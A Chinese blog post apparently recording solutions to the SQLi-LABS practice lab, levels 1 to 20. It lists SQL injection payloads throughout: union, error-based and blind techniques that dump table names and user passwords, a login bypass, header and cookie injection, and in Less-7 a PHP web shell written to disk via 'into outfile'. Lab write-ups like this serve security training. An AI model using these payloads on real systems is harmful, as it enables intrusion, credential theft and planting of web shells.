SQLi-LABS Basic Challenges通关记录

于 2019-10-14 23:20:57 发布
阅读量293 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40481505/article/details/102558868
版权

Less-1 Error Based String

Method 1:union注入

?id= 1' --+

?id=1' and 1=2 union select 1,2,3 --+

?id=1' and 1=2 union select 1,2,database() --+

?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

?id=1' and 1=2 union select 1,2,group_concat(id,':',username,':',password) from users --+

Method 2:xml报错注入

?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.columns where table_schema=database()))) --+

Less-2 Error Based intiger

去掉单引号,相同

Less-3 Error Based Single quotes with twist

id=1’) 其他相同

Less-4 Error Based Double Quotes String

id=1") 其他相同

Less-5 Double Injection Single Quotes String

Methord 1: Timing注入

?id=1' and sleep(20) --+

?id=1' and if(length(database())>1,sleep(5),1) --+

?id=1' and if(left(database(),1)='s',sleep(5),1) --+

?id=1' and if (left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),1) --+

?id=1' and if (left((select column_name from information_schema.columns where table_name='users'),1)='a',sleep(5),1) --+

?id=1' and if(left((select passwd from users),1)='s',sleep(5),1) --+

Methord 2:布尔型注入

?id=1' and left((select database()),1)='s'--+

?id=1' and left((select table_name from inforamtion_schema.tables where table_schema=database() limit 0,1),1)='s'--+

?id=1' and left((select column_name from information_schema.columns where table_name='NAME' limit 0,1),1)='s'--+

?id=1' and left((select COLUMN from TABLE limit 0,1 ))='s'--+

Less-6 Double Injection Double Quotes String

?id=1"其他一样

Less-7 Dump into outfile String

?id=1')) and union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "Path" --+

需要mysql开启secure_file_priv功能

Less-8 Blind Boolian based Single Quotes

?id=1' and 1=2--+

?id=1' and 1=1--+

?id=1' and left((select database()),1)='s'--+

?id=1' and Left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='s'--+

可以使用二分法,’=’ ‘<’ ‘>’

Less-9 Blind Time based Single Quote String

?id=1' and sleep(5)--+

?id=1' and if(length(database())=4,sleep(5),1)--+

?id=1' and if(left((select database()),1)='s',sleep(5),1)--+

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database()),1)='s',sleep(5),1)--+

同样可以使用二分法

Less-10 Blind Time based Double Quotes String

?id=1"其他相同

Less-11 Post Error Based Single quotes String

绕过登录

1' or 1=1#

1' and 1=1#

报错注入

1' and extractvalue(1,concat('~',(select database())))#

1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))#

1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='NAME')))#

1‘ and extractvalue(1,concat('~',(select group_concat(COLUMN) from TABLE)))#

union联合查询

1' and 1=2 union select 1,2#

1' and 1=2 union select 1,database()#

1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

1' and 1=2 union select 1,group_concat(id,':',username,':',password) from users#

Less-12 POST Error Based Double quotes String with twist

语句为

$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

"报错为
syntax to use near '""") and password=("") LIMIT 0,1' at line 1

")报错为syntax to use near '") and password=("") LIMIT 0,1' at line 1
因此传入后会自动再括号内增加""

联合注入

") and 1=2 union select 1,database()#

") and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

") and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name="name"#

") and 1=2  union select 1,group_concat("column1",':',"column2") from "table1"#

报错注入

") and extractvalue(1,concat('~',(select database())))#

Less-13 Double injection Single quote string with twist

'报错为`syntax to use near ‘’’’) and password=(’’) LIMIT 0,1’ at line 1
没有回显,无法使用union注入

报错注入

') and extractvalue(1, concat('~',(select database())))#

Timnig盲注

') or sleep(5)#

Bool盲注

') or 1=1#
') or 1=2#

') or left((select database()),1)='s'#

Less-14 POST Double injection Single quotes String with twist

报错注入

" or extractvalue(1,concat('~',(select database())))#

Bool盲注

" or left((select database()),1)='s'#

Timing盲注

" or if(left((select database()),1)='s',sleep(5),1)#

Less-15 POST Blind Boolian/time Based Single quotes

Less-16 POST Blind Boolian/time Based Single quotes

Bool
Timing

Less-17 POST Update Query Error Based string

对uname存在过滤,过滤转义字符,并对mysql相关符合转义

需要已知uname=admin

报错注入

' and updatexml(1,concat('~',database()),1)#

' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),1)#

' and updatexml(1,concat('~',(select id from (select id from users where username='admin') aaa )),1)#

' and updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') mingzi ),0x7e),1)#

Less-18 POST Header injection Uagent field Error based

sql语句为

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

需要对user-agent进行修改

' and extractvalue(1,concat('~',(select database()))) and '

需要已知uname=admin,password=admin

Less-19 POST Header injection Referer field Error based

sql语句为

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

需要修改Referer

' and extractvalue(1,concat('~',(select database()))) and '

' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '

需要已知uname,password

Less-20 POST Cookie injection Uagent field error based

sql语句为

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

需要修改cookie

' and extractvalue(1, concat('~',(select database())))#

' and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=databse())))#

修改后刷新网页

彬彬逊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值